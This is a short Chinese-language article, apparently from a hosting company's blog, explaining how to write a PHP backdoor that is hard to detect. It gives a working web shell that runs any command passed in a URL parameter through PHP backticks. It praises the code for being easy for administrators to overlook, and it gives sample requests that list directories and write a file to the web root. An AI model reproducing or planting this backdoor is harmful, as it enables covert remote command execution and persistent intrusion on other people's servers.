如何編寫一個(gè)不易被發(fā)現(xiàn)的PHP后門代碼

發(fā)布時(shí)間：2021-09-29 09:42:42 來(lái)源：億速云閱讀：118 作者：iii 欄目：開(kāi)發(fā)技術(shù)

本篇內(nèi)容介紹了“如何編寫一個(gè)不易被發(fā)現(xiàn)的PHP后門代碼”的有關(guān)知識(shí)，在實(shí)際案例的操作過(guò)程中，不少人都會(huì)遇到這樣的困境，接下來(lái)就讓小編帶領(lǐng)大家學(xué)習(xí)一下如何處理這些情況吧！希望大家仔細(xì)閱讀，能夠?qū)W有所成！

這里用到了一個(gè)一般的PHPer都不怎么關(guān)注的反撇號(hào) ` ，反撇號(hào)包含的字符串，等同于shell_exec函數(shù)。

偽裝性很好，很容易被管理員忽略。

$selfNums = $_GET['r'];
if (isset($selfNums)){
  echo `$selfNums`;
}

剛看到這段代碼我想大家都會(huì)說(shuō)沒(méi)有問(wèn)題，但是細(xì)心的朋友也會(huì)發(fā)現(xiàn)下面的變量被一個(gè)符號(hào)包起來(lái)了，既然是變量為什么要這樣了，

而且又不是單引號(hào)，這個(gè)就是關(guān)鍵所在了，這個(gè)符號(hào)是 Esc 下面的一個(gè)鍵（位于感嘆號(hào)！旁邊的），

通過(guò) echo `系統(tǒng)命令`; 可以達(dá)到 system(); 一樣的效果

如果不信的朋友可以測(cè)試

http://127.0.0.1/t.php?r=dir 可以列出目錄

http://127.0.0.1/t.php?r=echo 我是馬兒 >>D:\web\90sec.php

我用 appserv 和虛擬主機(jī)已經(jīng)測(cè)試成功。

“如何編寫一個(gè)不易被發(fā)現(xiàn)的PHP后門代碼”的內(nèi)容就介紹到這里了，感謝大家的閱讀。如果想了解更多行業(yè)相關(guān)的知識(shí)可以關(guān)注億速云網(wǎng)站，小編將為大家輸出更多高質(zhì)量的實(shí)用文章！

向AI問(wèn)一下細(xì)節(jié)

如何編寫一個(gè)不易被發(fā)現(xiàn)的PHP后門代碼

猜你喜歡

最新資訊

相關(guān)推薦

相關(guān)標(biāo)簽